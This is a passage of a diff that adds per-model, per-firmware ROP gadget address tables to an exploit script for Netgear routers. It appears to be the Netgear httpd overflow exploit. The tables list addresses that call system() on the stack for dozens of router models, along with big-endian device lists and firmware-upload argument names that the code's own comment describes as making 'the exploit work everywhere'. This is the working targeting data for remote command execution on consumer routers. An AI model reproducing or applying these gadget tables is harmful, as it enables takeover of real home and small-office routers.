}, + "MBRN3000" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.0.74" : [0x462750, 0x40CB10], + "1.0.0.72" : [0x4602A0, 0x40CA20], + "1.0.0.72NA" : [0x45FF40, 0x40CA40], + "1.0.0.69" : [0x45FB80, 0x40CA68], + "1.0.0.69NA" : [0x45F7F0, 0x40CA98], + "1.0.0.65" : [0x45FA30, 0x40CA38], + "1.0.0.65NA" : [0x45F6B0, 0x40CA78], + "1.0.0.43NA" : [0x45BE74, 0x40C34C], + }, + "MVBR1210C" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.2.0.35" : [0x48AA20, 0x41113C], + }, + "R4500" : { + # 0) gadget: calls system($sp+0x78) + "1.0.0.4" : 0x4430dc, + }, + "R6200" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.1.58" : [0x43DBA8, 0x41A4EC], + "1.0.1.56" : [0x43DB58, 0x41A4EC], + "1.0.1.52" : [0x43DB58, 0x41A4EC], + "1.0.1.48" : [0x43D028, 0x41A2AC], + "1.0.1.46" : [0x43CEB8, 0x41A0DC], + "1.0.0.28" : [0x43B808, 0x419598], + "1.0.0.18" : [0x43AD90, 0x418BC8], + }, + "R6200V2" : { + # 0) gadget: calls system($sp) + "1.0.3.12" : 0x2c460, + "1.0.3.10" : 0x2c430, + "1.0.1.20" : 0x280dc, + "1.0.1.18" : 0x280dc, + "1.0.1.16" : 0x280dc, + "1.0.1.14" : 0x280dc, + }, + "R6250" : { + # 0) gadget: calls system($sp) + "1.0.4.38" : 0x2f2dc, + "1.0.4.36" : 0x2f2dc, + "1.0.4.34" : 0x2f2e4, + "1.0.4.26" : 0x2eba0, + "1.0.4.20" : 0x2e82c, + "1.0.4.16" : 0x2d82c, + "1.0.4.14" : 0x2d718, + "1.0.4.12" : 0x2d708, + "1.0.4.08" : 0x2d0b0, + "1.0.4.06" : 0x2cf58, + "1.0.4.02" : 0x2ccac, + "1.0.3.12" : 0x2c430, + "1.0.3.06" : 0x2c430, + "1.0.1.84" : 0x28100, + "1.0.1.82" : 0x28100, + "1.0.1.80" : 0x28100, + "1.0.0.72" : 0x27cd8, + "1.0.0.70" : 0x27cd8, + "1.0.0.62" : 0x27cd8, + }, + "R6300" : { + # 0) gadget: calls system($sp+0x78) + "1.0.2.80" : 0x44727C, + "1.0.2.78" : 0x446C2C, + "1.0.2.76" : 0x446C2C, + "1.0.2.70" : 0x446A3C, + "1.0.2.68" : 0x446A3C, + "1.0.2.38" : 0x44673C, + "1.0.2.36" : 0x44673C, + "1.0.2.26" : 0x445E1C, + "1.0.2.14" : 0x4443CC, + "1.0.2.10" : 0x4443CC, + "1.0.0.90" : 0x4443CC, + "1.0.0.68" : 0x44439C, + }, + "R6300V2" : { + # 0) gadget: calls system($sp) + "1.0.4.36" : 0x2a65c, + "1.0.4.34" : 0x2a65c, + "1.0.4.32" : 0x2A53C, + "1.0.4.28" : 0x29fc0, + "1.0.4.24" : 0x29ee8, + "1.0.4.8" : 0x295d0, + "1.0.4.6" : 0x290f0, + "1.0.4.2" : 0x28c10, + "1.0.3.30" : 0x28c10, + "1.0.3.28" : 0x286d4, + "1.0.3.26" : 0x286d4, + "1.0.3.22" : 0x28728, + "1.0.3.8" : 0x2862C, + "1.0.3.6CH" : 0x2bd0c, + "1.0.3.2" : 0x2862c, + "1.0.2.86" : 0x27cfc, + "1.0.2.72" : 0x27cfc, + "1.0.1.72" : 0x27cd8, + }, + "R6400" : { + # 0) gadget: calls system($sp) + "1.0.1.52" : 0x31994, + "1.0.1.50" : 0x31974, + "1.0.1.46" : 0x31884, + "1.0.1.44" : 0x31244, + "1.0.1.42" : 0x31204, + "1.0.1.36" : 0x30D3C, + "1.0.1.34" : 0x30ba8, + "1.0.1.26" : 0x30a5c, + "1.0.1.24" : 0x30a10, + "1.0.1.22" : 0x30904, + "1.0.1.20" : 0x30648, + "1.0.1.18" : 0x302fc, + "1.0.1.12" : 0x2fdf4, + "1.0.1.6" : 0x2f6b4, + "1.0.0.26" : 0x2f6b4, + "1.0.0.24" : 0x2e96c, + "1.0.0.20" : 0x2e840, + "1.0.0.14" : 0x2e924, + }, + "R6400V2" : { + # 0) gadget: calls system($sp) + "1.0.4.84" : 0xf9c4, + "1.0.4.82" : 0xf9c4, + "1.0.4.78" : 0xf980, + "1.0.3.66" : 0xf0b0, + "1.0.2.66" : 0xf0b0, + "1.0.2.62" : 0xf0b0, + "1.0.2.60" : 0xf038, + "1.0.2.56" : 0x32078, + "1.0.2.52" : 0x31718, + "1.0.2.50" : 0x314c4, + "1.0.2.46" : 0x31414, + "1.0.2.44" : 0x313e8, + "1.0.2.34" : 0x30e54, + "1.0.2.32" : 0x30e1c, + "1.0.2.14" : 0x30a94, + }, + "R6700" : { + # 0) gadget: calls system($sp) + "1.0.2.8" : 0x3cfa0, + "1.0.2.6" : 0x38ff4, + "1.0.1.48" : 0x3818c, + "1.0.1.46" : 0x37e3c, + "1.0.1.44" : 0x37d1c, + "1.0.1.36" : 0x3779c, + "1.0.1.32" : 0x37704, + "1.0.1.26" : 0x371f8, + "1.0.1.22" : 0x361d0, + "1.0.1.20" : 0x35d8c, + "1.0.1.16" : 0x35750, + "1.0.1.14" : 0x2efac, + "1.0.0.26" : 0x2ed28, + "1.0.0.24" : 0x2ed28, + "1.0.0.2" : 0x2d5c8, + }, + "R6700V3" : { + # 0) gadget: calls system($sp) + "1.0.4.84" : 0xf9c4, + "1.0.4.82" : 0xf9c4, + "1.0.4.78" : 0xf980, + "1.0.3.66" : 0xf0b0, + "1.0.2.66" : 0xf0b0, + "1.0.2.62" : 0xf0b0, + "1.0.2.60" : 0xf038, + "1.0.2.56" : 0x32078, + "1.0.2.52" : 0x31718, + }, + "R6900" : { + # 0) gadget: calls system($sp) + "1.0.2.8" : 0x3cfa0, + "1.0.2.6" : 0x38ff4, + "1.0.2.4" : 0x38a3c, + "1.0.1.48" : 0x3818c, + "1.0.1.46" : 0x37e3c, + "1.0.1.44" : 0x37d1c, + "1.0.1.34" : 0x379e4, + "1.0.1.28" : 0x3794c, + "1.0.1.26" : 0x371f8, + "1.0.1.22" : 0x361d0, + "1.0.1.20" : 0x35d8c, + "1.0.1.16" : 0x35750, + "1.0.1.14" : 0x2efb4, + "1.0.0.4" : 0x2ed30, + "1.0.0.2" : 0x2ed30, + }, + "R6900P" : { + # 0) gadget: calls system($sp) + "1.3.1.64" : 0x3a21c, + "1.3.1.44" : 0x39904, + "1.3.1.26" : 0x37114, + "1.3.0.20" : 0x37114, + "1.3.0.8" : 0x36ff4, + "1.2.0.22" : 0x36ad0, + "1.0.1.14" : 0x369f4, + "1.0.0.58" : 0x367b8, + "1.0.0.46" : 0x3600c, + }, + "R7000" : { + # 0) gadget: calls system($sp) + "0.96" : 0x2c990, + "1.22" : 0x2cc00, + "2.16" : 0x2cbec, + "2.19" : 0x2d04c, + "3.24" : 0x2d608, + "3.56" : 0x2d568, + "3.60" : 0x2de64, + "3.68" : 0x2d5c8, + "3.80" : 0x2d5c0, + "4.18" : 0x2ecac, + "4.28" : 0x2ecf4, + "4.30" : 0x2ed30, + "5.64" : 0x32520, + "5.70" : 0x32768, + "7.2" : 0x32768, + "7.6" : 0x329e8, + "7.10" : 0x32a44, + "7.12" : 0x36070, + "8.34" : 0x37528, + "9.6" : 0x3763C, + "9.10" : 0x3794C, + "9.12" : 0x3794C, + "9.14" : 0x37B08, + "9.18" : 0x37B14, + "9.26" : 0x37d1c, + "9.28" : 0x37dbc, + "9.32" : 0x38198, + "9.34" : 0x38174, + "9.42" : 0x38978, + "9.60" : 0x38FF4, + "9.64" : 0x3C3C4, + "9.88" : 0x3cfb4, + "11.100" : 0x3d000, + }, + "R7000P" : { + # 0) gadget: calls system($sp) + "1.3.1.64" : 0x3a21c, + "1.3.1.44" : 0x39904, + "1.3.1.26" : 0x37114, + "1.3.0.20" : 0x37114, + "1.3.0.8" : 0x36ff4, + "1.2.0.22" : 0x36ad0, + "1.0.1.14" : 0x369f4, + "1.0.0.58" : 0x367b8, + "1.0.0.56" : 0x36658, + "1.0.0.50" : 0x35f40, + "1.0.0.46" : 0x3600c, + "1.0.0.44" : 0x35dc8, + }, + "R7100LG" : { + # 0) gadget: calls system($sp) + "1.0.0.52" : 0x342d4, + "1.0.0.50" : 0x341e4, + "1.0.0.48" : 0x33ec0, + "1.0.0.46" : 0x33e80, + "1.0.0.42" : 0x339ac, + "1.0.0.40" : 0x3397c, + "1.0.0.38" : 0x338d8, + "1.0.0.36" : 0x338d8, + "1.0.0.34" : 0x3381c, + "1.0.0.32" : 0x33788, + "1.0.0.30" : 0x33520, + "1.0.0.28" : 0x3326c, + "1.0.0.24" : 0x32f30, + }, + "R7300" : { + # 0) gadget: calls system($sp) + "1.0.0.74" : 0x33fb0, + "1.0.0.70" : 0x33fb8, + "1.0.0.68" : 0x33b70, + "1.0.0.62" : 0x33740, + "1.0.0.60" : 0x33588, + "1.0.0.56" : 0x33468, + "1.0.0.54" : 0x33458, + "1.0.0.52" : 0x331d0, + "1.0.0.46" : 0x32d20, + "1.0.0.44" : 0x32ae4, + "1.0.0.32" : 0x3267c, + "1.0.0.26" : 0x32628, + }, + "R7850" : { + # 0) gadget: calls system($sp) + "1.0.5.48" : 0x36dd0, + "1.0.4.46" : 0x36da8, + "1.0.4.42" : 0x365b0, + }, + "R7900" : { + # 0) gadget: calls system($sp) + "1.0.4.22" : 0x36da8, + "1.0.3.18" : 0x36da8, + "1.0.3.10" : 0x36c80, + "1.0.3.8" : 0x365b0, + "1.0.2.16" : 0x36110, + "1.0.2.10" : 0x346d8, + "1.0.1.26" : 0x34028, + "1.0.1.18" : 0x33fe4, + "1.0.1.12" : 0x336f8, + "1.0.1.8" : 0x332dc, + "1.0.1.4" : 0x33058, + "1.0.0.10" : 0x3290c, + "1.0.0.8" : 0x326ec, + "1.0.0.6" : 0x2f48c, + "1.0.0.2" : 0x2f470, + }, + "R8000" : { + # 0) gadget: calls system($sp) + "1.0.4.46" : 0x36dac, + "1.0.4.28" : 0x365b0, + "1.0.4.18" : 0x36110, + "1.0.4.12" : 0x346d8, + "1.0.4.4" : 0x34310, + "1.0.4.2" : 0x34284, + "1.0.3.54" : 0x34028, + "1.0.3.48" : 0x33fe4, + "1.0.3.46" : 0x33e84, + "1.0.3.36" : 0x33ac4, + "1.0.3.32" : 0x336f8, + "1.0.3.26" : 0x332dc, + "1.0.3.4" : 0x33058, + "1.0.2.46" : 0x3290c, + "1.0.2.44" : 0x326f4, + "1.0.1.16" : 0x2f370, + "1.0.0.110" : 0x2f2a0, + "1.0.0.108" : 0x2f2a8, + "1.0.0.102" : 0x2f2a0, + "1.0.0.100" : 0x2f0f0, + "1.0.0.90" : 0x2f0e8, + "1.0.0.76" : 0x2f0ac, + "1.0.0.74" : 0x2f068, + "1.0.0.68" : 0x2f0ac, + "1.0.0.46" : 0x2f0ac, + }, + "R8300" : { + # 0) gadget: calls system($sp) + "1.0.2.130" : 0x35B18, + "1.0.2.128" : 0x35B18, + "1.0.2.122" : 0x355fc, + "1.0.2.116" : 0x35258, + "1.0.2.106" : 0x34f40, + "1.0.2.100" : 0x34d38, + "1.0.2.94" : 0x34d8c, + "1.0.2.86" : 0x348b8, + "1.0.2.80" : 0x348b8, + "1.0.2.48" : 0x340b8, + }, + "R8500" : { + # 0) gadget: calls system($sp) + "1.0.2.130" : 0x35b18, + "1.0.2.128" : 0x35B18, + "1.0.2.122" : 0x355fc, + "1.0.2.116" : 0x35258, + "1.0.2.106" : 0x34f40, + "1.0.2.100" : 0x34d38, + "1.0.2.94" : 0x34d8c, + "1.0.2.86" : 0x348b8, + "1.0.2.80" : 0x348b8, + "1.0.2.64" : 0x34104, + "1.0.2.54" : 0x33f30, + "1.0.2.30" : 0x33dd4, + "1.0.2.26" : 0x33d9c, + "1.0.0.56" : 0x33da8, + "1.0.0.52" : 0x33da8, + "1.0.0.42" : 0x33da8, + "1.0.0.28" : 0x33da8, + }, + "RS400" : { + # 0) gadget: calls system($sp) + "1.5.0.34" : 0x10120, + }, + "WGR614V8" : { + # 0) gadget: calls system($sp+0x18) + "1.2.10" : 0x43B9C0, + "1.2.10NA" : 0x43B9C0, + "1.1.24" : 0x43A46C, + "1.1.24NA" : 0x43A46C, + "1.1.2" : 0x438DAC, + "1.1.2NA" : 0x438DCC, + "1.1.11" : 0x43A56C, + "1.1.11NA" : 0x43A56C, + "1.1.1NA" : 0x438A8C, + "1.1.20" : 0x43A56C, + "1.1.20NA" : 0x43A56C, + }, + "WGR614V9" : { + # 0) gadget: calls system($sp+0x30) + "1.2.32" : 0x450280, + "1.2.32NA" : 0x450290, + "1.2.30" : 0x450280, + "1.2.30NA" : 0x450290, + "1.2.24" : 0x44E730, + "1.2.24NA" : 0x44E750, + "1.2.6" : 0x44C72C, + "1.2.6NA" : 0x44C74C, + "1.2.2" : 0x44D1BC, + "1.2.2NA" : 0x44D1DC, + "1.0.18" : 0x450E3C, + "1.0.18NA" : 0x450D8C, + "1.0.15" : 0x44FD60, + "1.0.15NA" : 0x44FDA0, + "1.0.9NA" : 0x44EE40, + }, + "WGR614V10" : { + # 0) gadget: calls system($sp+0x30) + "1.0.2.66" : 0x480294, + "1.0.2.66NA" : 0x47FEEC, + "1.0.2.60" : 0x47F6CC, + "1.0.2.60NA" : 0x47FA94, + "1.0.2.58NA" : 0x47FA94, + "1.0.2.54" : 0x4775B4, + "1.0.2.54NA" : 0x4775B4, + "1.0.2.26" : 0x46A5E4, + "1.0.2.26NA" : 0x46A5F4, + "1.0.2.18" : 0x467D7C, + "1.0.2.18NA" : 0x467D8C, + }, + "WGT624V4" : { + # 0) gadget: calls system($sp+0x18) + "2.0.13.2" : 0x42AFF4, + "2.0.13" : 0x42AFF4, + "2.0.13NA" : 0x42AFF4, + "2.0.12" : 0x42AFA4, + "2.0.12NA" : 0x42AFA4, + "2.0.6NA" : 0x42A1F4, + }, + "WN2500RP" : { + # 0) gadget: calls system($sp+0x18) + "1.0.0.30" : 0x44E780, + "1.0.0.26" : 0x44E780, + "1.0.0.24" : 0x44E780, + }, + "WN2500RPV2" : { + # 0) gadget: calls system($sp+0x18) + "1.0.1.54" : 0x46335C, + "1.0.1.50" : 0x462AFC, + "1.0.1.46" : 0x460E54, + "1.0.1.42" : 0x460D44, + "1.0.0.30" : 0x44A804, + }, + "WN3000RP" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s3 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.2.64" : [0x443048, 0x40EA14], + + # 0) gadget: calls system($sp+0x18) + "1.0.1.36" : 0x4395e0, + "1.0.1.34" : 0x4395d0, + "1.0.1.18" : 0x438440, + "1.0.0.12" : 0x445370, + }, + "WN3100RP" : { + # 0) gadget: calls system($sp+0x18) + "1.0.0.20" : 0x439750, + "1.0.0.16" : 0x439550, + "1.0.0.14" : 0x439290, + "1.0.0.6" : 0x439400, + }, + "WN3500RP" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.0.22" : [0x436BC4, 0x415C68], + "1.0.0.20" : [0x436BD4, 0x415C98], + "1.0.0.18" : [0x436BA4, 0x415C40], + "1.0.0.16" : [0x436C74, 0x415BF0], + "1.0.0.14" : [0x436E44, 0x415D90], + "1.0.0.12" : [0x436DC4, 0x415D90], + }, + "WNCE3001" : { + # 0) gadget: calls system($sp+0x18) + "1.0.0.50" : 0x412c68, + "1.0.0.46" : 0x412c68, + "1.0.0.44" : 0x412c68, + "1.0.0.38" : 0x412bb8, + }, + "WNDR3300" : { + # 0) gadget: calls system($sp+0x18) + "1.0.45" : 0x432C6C, + "1.0.45NA" : 0x432C6C, + "1.0.29" : 0x431EDC, + "1.0.29NA" : 0x431EDC, + "1.0.27NA" : 0x4389EC, + "1.0.26" : 0x4388CC, + "1.0.26NA" : 0x4388CC, + "1.0.23NA" : 0x43919C, + "1.0.14" : 0x438A8C, + "1.0.14NA" : 0x438A8C, + }, + "WNDR3300V2" : { + # 0) gadget: calls system($sp+0x18) + "1.0.0.26" : 0x448020, + }, + "WNDR3400" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.0.52" : [0x490950, 0x412DF8], + "1.0.0.50" : [0x4908C0, 0x412DF8], + + # 0) gadget: calls system($sp+0x18) + "1.0.0.38" : 0x4B6880, + "1.0.0.34" : 0x4B6320, + }, + "WNDR3400V2" : { + # 0) gadget: calls system($sp+0x78) + "1.0.0.54" : 0x44858C, + "1.0.0.52" : 0x44848C, + "1.0.0.38" : 0x44632C, + "1.0.0.34" : 0x44629C, + "1.0.0.16" : 0x4420DC, + "1.0.0.12" : 0x4420DC, + }, + "WNDR3400V3" : { + # 0) gadget: calls system($sp+0x78) + "1.0.1.24" : 0x44C4BC, + "1.0.1.22" : 0x44BFFC, + "1.0.1.18" : 0x44BABC, + "1.0.1.16" : 0x44B7EC, + "1.0.1.14" : 0x44B53C, + "1.0.1.12" : 0x44929C, + "1.0.1.8" : 0x448CEC, + "1.0.1.4" : 0x448A2C, + "1.0.1.2" : 0x448A2C, + "1.0.0.48" : 0x448A2C, + "1.0.0.46" : 0x448A2C, + "1.0.0.38" : 0x44717C, + "1.0.0.22" : 0x44626C, + "1.0.0.20" : 0x44623C, + }, + "WNDR3700V3" : { + # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address + # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp); + # - The end of the _init_proc function + # 2) gadget: set $fp to $sp, set $a0 to $sp+0x25, and calls memset + # - The beginning of the build_asp_handler_table function + "1.0.0.42" : [0x610070+0x72c, 0x40BB10, 0x4206FC], + "1.0.0.38" : [0x60e3d0+0x71c, 0x40BA14, 0x41FB70], + "1.0.0.36" : [0x60d080+0x71c, 0x40B92C, 0x41F8B0], + "1.0.0.30" : [0x60d080+0x71c, 0x40B92C, 0x41F8B0], + "1.0.0.22" : [0x608f50+0x720, 0x40B868, 0x41F6A0], + + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.0.18" : [0x490590, 0x490550], + }, + "WNDR4000" : { + # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address + # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp); + # - The end of the _init_proc function + # 2) gadget: set $fp to $sp, set $a0 to $sp+0x25, and calls memset + # - The beginning of the build_asp_handler_table function + "1.0.2.10" : [0x6397f0+0x73c, 0x40BBC8, 0x420E6C], + "1.0.2.6" : [0x60ffe0+0x72c, 0x40BAB4, 0x42066C], + "1.0.2.4" : [0x60e040+0x720, 0x40B9B0, 0x41FB50], + "1.0.2.2" : [0x60da60+0x720, 0x40B91C, 0x41F8E0], + "1.0.0.94" : [0x60da60+0x720, 0x40B91C, 0x41F8E0], + "1.0.0.90" : [0x60cfa0+0x71c, 0x40B8C0, 0x41F890], + "1.0.0.88" : [0x608f20+0x71c, 0x40B844, 0x41F680], + + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.0.82" : [0x490860, 0x490820], + "1.0.0.66" : [0x48CDC0, 0x48CD80], + }, + "WNDR4500" : { + # 0) gadget: calls system($sp+0x78) + "1.0.1.46" : 0x447D5C, + "1.0.1.40" : 0x44719C, + "1.0.1.38" : 0x4460ec, + "1.0.1.36" : 0x4460ec, + "1.0.1.20" : 0x4459fc, + "1.0.1.18" : 0x44584C, + "1.0.1.6" : 0x4430dc, + "1.0.0.58" : 0x44257C, + "1.0.0.50" : 0x44257c, + "1.0.0.40" : 0x44257c, + }, + "WNDR4500V2" : { + # 0) gadget: calls system($sp+0x78) + "1.0.0.72" : 0x45005C, + "1.0.0.68" : 0x44FF2C, + "1.0.0.64" : 0x44F99C, + "1.0.0.62" : 0x44F09C, + "1.0.0.60" : 0x44EE5C, + "1.0.0.56" : 0x44EE5C, + "1.0.0.54" : 0x44E0FC, + "1.0.0.50" : 0x44D6DC, + "1.0.0.42" : 0x44D6DC, + "1.0.0.36" : 0x4467EC, + "1.0.0.26" : 0x44621C, + }, + "WNR834BV2" : { + # 0) gadget: calls system($sp+0x18) + "2.1.13" : 0x43902C, + "2.1.13NA" : 0x43902C, + "2.0.8" : 0x43894C, + "2.0.8NA" : 0x43894C, + "1.0.32" : 0x43799C, + "1.0.32NA" : 0x43799C, + }, + "WNR1000V3" : { + # 0) gadget: calls system($sp+0x18) + "1.0.2.72" : 0x460060, + "1.0.2.72NA" : 0x460060, + "1.0.2.68" : 0x45F604, + "1.0.2.68NA" : 0x45F604, + "1.0.2.62" : 0x454BB4, + "1.0.2.62NA" : 0x454BB4, + "1.0.2.60" : 0x454BB4, + "1.0.2.60NA" : 0x454BB4, + "1.0.2.54" : 0x450ED0, + "1.0.2.54NA" : 0x450ED0, + "1.0.2.28" : 0x4448A0, + "1.0.2.28NA" : 0x4448A0, + "1.0.2.26" : 0x4446A0, + "1.0.2.26NA" : 0x4446A0, + "1.0.2.18" : 0x442D50, + "1.0.2.18NA" : 0x442D50, + "1.0.2.4" : 0x440F70, + }, + "WNR2000V2" : { + # 0) gadget: calls system($sp+0x78) + "1.2.0.8" : 0x434D04, + "1.2.0.8NA" : 0x434CF4, + "1.2.0.6" : 0x433F34, + "1.2.0.6NA" : 0x433F34, + "1.2.0.4" : 0x433EA4, + "1.2.0.4NA" : 0x433E94, + + # 0) gadget: calls system($sp+0x18) + "1.0.0.40" : 0x4446A0, + "1.0.0.40NA" : 0x4446A0, + "1.0.0.35" : 0x43F340, + "1.0.0.34" : 0x43F340, + "1.0.0.34NA" : 0x43F340, + }, + "WNR3500" : { + # 0) gadget: calls system($sp) + "1.0.36NA" : 0x2CBD0, + "1.0.30" : 0x2a714, + "1.0.29NA" : 0x2a72c, + "1.0.22" : 0x2a4c4, + "1.0.22NA" : 0x2a4fc, + "1.0.15NA" : 0x2a3c8, + "1.0.10NA" : 0x2a1f4, + }, + "WNR3500V2" : { + # 0) gadget: calls system($sp+0xac) + "1.2.2.28" : 0x435FA0, + "1.2.2.28NA" : 0x435F60, + + # 0) gadget: calls system($sp+0x18) + "1.0.2.14" : 0x48D1EC, + "1.0.2.14NA" : 0x48CFAC, + "1.0.2.10" : 0x484D5C, + "1.0.2.10NA" : 0x484B1C, + "1.0.0.64" : 0x4350DC, + "1.0.0.64NA" : 0x4350DC, + }, + "WNR3500L" : { + # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address + # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp); + # 2) gadget: set $a0 to $sp+0x40, and calls memset + "1.2.2.48NA" : [0x5740f0+0x630, 0x409830, 0x409D30], + "1.2.2.44" : [0x5740f0+0x630, 0x409830, 0x409D30], + "1.2.2.44NA" : [0x5740f0+0x630, 0x409830, 0x409D30], + "1.2.2.40" : [0x568490+0x618, 0x4095AC, 0x409AB4], + "1.2.2.40NA" : [0x568360+0x618, 0x4095AC, 0x409AB4], + "1.2.2.30" : [0x568490+0x618, 0x4095AC, 0x409AB4], + "1.2.2.30NA" : [0x568360+0x618, 0x4095AC, 0x409AB4], + + # 0) gadget: calls system($sp+0x18) + "1.0.2.50" : 0x4A6574, + "1.0.2.50NA" : 0x4A6334, + "1.0.2.26" : 0x4A3B7C, + "1.0.2.26NA" : 0x4A392C, + "1.0.0.88" : 0x438564, + "1.0.0.88NA" : 0x438564, + "1.0.0.86" : 0x438564, + "1.0.0.86NA" : 0x438564, + }, + "WNR3500LV2" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x80 and calls $t9 + "1.2.0.56" : [0x4458F8, 0x4A6EDC], + "1.2.0.54" : [0x4456C8, 0x4A6BEC], + "1.2.0.50" : [0x445578, 0x4A68EC], + "1.2.0.48" : [0x445268, 0x4A4814], + "1.2.0.46" : [0x444BF8, 0x4A4098], + "1.2.0.44" : [0x445038, 0x4A3C18], + "1.2.0.40" : [0x443C28, 0x4A2808], + "1.2.0.38" : [0x443C18, 0x4A2718], + "1.2.0.34" : [0x4436F8, 0x4A1674], + "1.2.0.32" : [0x4436F8, 0x4A1674], + "1.2.0.28" : [0x4436F8, 0x4A1684], + "1.2.0.26" : [0x4436F8, 0x4A1684], + "1.2.0.20" : [0x43A8B8, 0x492D00], + "1.2.0.18" : [0x43A8B8, 0x492D00], + "1.2.0.16" : [0x43A8B8, 0x492D00], + "1.0.0.14" : [0x43758C, 0x48A850], + + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.0.10" : [0x4371FC, 0x4177B0], + }, + "XR300" : { + # 0) gadget: calls system($sp) + "1.0.3.38" : 0x33258, + "1.0.3.34" : 0x33258, + "1.0.3.26" : 0x329b0, + "1.0.2.24" : 0x329a4, + "1.0.2.18" : 0x32a84, + "1.0.1.4" : 0x325dc, + }, +} + +# Devices that are big endian +big_endian_devices = ["D6220", "D6300", "D6400", "D7000V2", "DGN2200", "DGN2200M", "DGN2200V4", "DGND3700", "MBM621", + "MBRN3000", "WGT624V4", "WNCE3001"] + +# The argument name for the file upload. If not listed, it's mtenFWUpload +# It would be real nice if Netgear could standardize on how they update, so I could +# make the exploit work everywhere without handling a dozen corner cases. +argument_names = { + "EX3700" : { + "1.0.0.22" : "update_file", + "1.0.0.24" : "update_file", + "1.0.0.26" : "update_file", + "1.0.0.28" : "update_file", + "1.0.0.34" : "update_file", + "1.0.0.44" : "update_file", + "1.0.0.46" : "update_file", + "1.0.0.48" : "update_file", + "1.0.0.50" : "update_file", + "1.0.0.58" : "update_file", + "1.0.0.62" : "update_file", + "1.0.0.64" : "update_file", + "1.0.0.68" : "update_file", + "1.0.0.70" : "update_file", + "1.0.0.72" : "update_file", + "1.0.0.76" : "update_file", + "1.0.0.78" : "update_file", + }, + "EX3800" : { + "1.0.0.26" : "update_file", + "1.0.0.28" : "update_file", + "1.0.0.34" : "update_file", + "1.0.0.44" : "update_file", + "1.0.0.46" : "update_file", + "1.0.0.48" : "update_file", + "1.0.0.50" : "update_file", + "1.0.0.58" : "update_file", + "1.0.0.62" : "update_file", + "1.0.0.64" : "update_file", + "1.0.0.68" : "update_file", + "1.0.0.70" : "update_file", + "1.0.0.72" : "update_file", + "1.0.0.76" : "update_file", + "1.0.0.78" : "update_file", + }, + "EX3920" : { + "1.0.0.26" : "update_file", + "1.0.0.28" : "update_file", + "1.0.0.34" : "update_file", + "1.0.0.44" : "update_file", + "1.0.0.46" : "update_file", + "1.0.0.48" : "update_file", + "1.0.0.50" : "update_file", + "1.0.0.58" : "update_file", + "1.0.0.62" : "update_file", + "1.0.0.64" : "update_file", + "1.0.0.68" : "update_file", + "1.0.0.70" : "update_file", + "1.0.0.72" : "update_file", + "1.0.0.76" : "update_file", + "1.0.0.78" : "update_file", + }, + "EX6000" : { + "1.0.0.10" : "update_file", + "1.0.0.20" : "update_file", + "1.0.0.24" : "update_file", + "1.0.0.28" : "update_file", + "1.0.0.30" : "update_file", + "1.0.0.32" : "update_file", + "1.0.0.38" : "update_file", + }, + "EX6100" : { + "1.0.2.6" : "update_file", + "1.0.1.36" : "update_file", + "1.0.2.16" : "update_file", + "1.0.2.18" : "update_file", + "1.0.2.24" : "update_file", + }, + "EX6120" : { + "1.0.0.4" : "update_file", + "1.0.0.8" : "update_file", + "1.0.0.14" : "update_file", + "1.0.0.16" : "update_file", + "1.0.0.26" : "update_file", + "1.0.0.28" : "update_file", + "1.0.0.30" : "update_file", + "1.0.0.32" : "update_file", + "1.0.0.36" : "update_file", + "1.0.0.40" : "update_file", + "1.0.0.42" : "update_file", + "1.0.0.46" : "update_file", + "1.0.0.48" : "update_file", + }, + "EX6130" : { + "1.0.0.12" : "update_file", + "1.0.0.16" : "update_file", + "1.0.0.20" : "update_file", + "1.0.0.22" : "update_file", + "1.0.0.24" : "update_file", + "1.0.0.28" : "update_file", + "1.0.0.30" : "update_file", + }, + "EX6150" : { + "1.0.0.14" : "updateFile", + "1.0.0.16" : "update_file", + "1.0.0.28" : "update_file", + "1.0.0.32" : "update_file", + "1.0.0.34" : "update_file", + "1.0.0.42" : "update_file", + }, + "EX6200" : { + "1.0.3.68" : "update_file", + "1.0.3.74" : "update_file", + "1.0.3.76" : "update_file", + "1.0.3.82" : "update_file", + "1.0.3.88" : "update_file", + "1.0.3.90" : "update_file", + }, + "EX6920" : { + "1.0.0.4" : "update_file", + "1.0.0.8" : "update_file", + "1.0.0.14" : "update_file", + "1.0.0.16" : "update_file", + "1.0.0.26" : "update_file", + "1.0.0.28" : "update_file", + "1.0.0.30" : "update_file", + "1.0.0.32" : "update_file", + "1.0.0.36" : "update_file", + "1.0.0.40" : "update_file", + }, + "EX7000" : { + "1.0.0.30" : "updateFile", + "1.0.0.32" : "updateFile", + "1.0.0.36" : "update_file", + "1.0.0.38" : "update_file", + "1.0.0.42" : "update_file", + "1.0.0.50" : "update_file", + "1.0.0.56" : "update_file", + "1.0.0.58" : "update_file", + "1.0.0.62" : "update_file", + "1.0.0.66" : "update_file", + "1.0.1.78" : "update_file", + "1.0.1.80" : "update_file", + "1.0.1.84" : "update_file", + }, + "WN2500RPV2" : { + "1.0.1.42" : "update_file", + "1.0.1.46" : "update_file", + 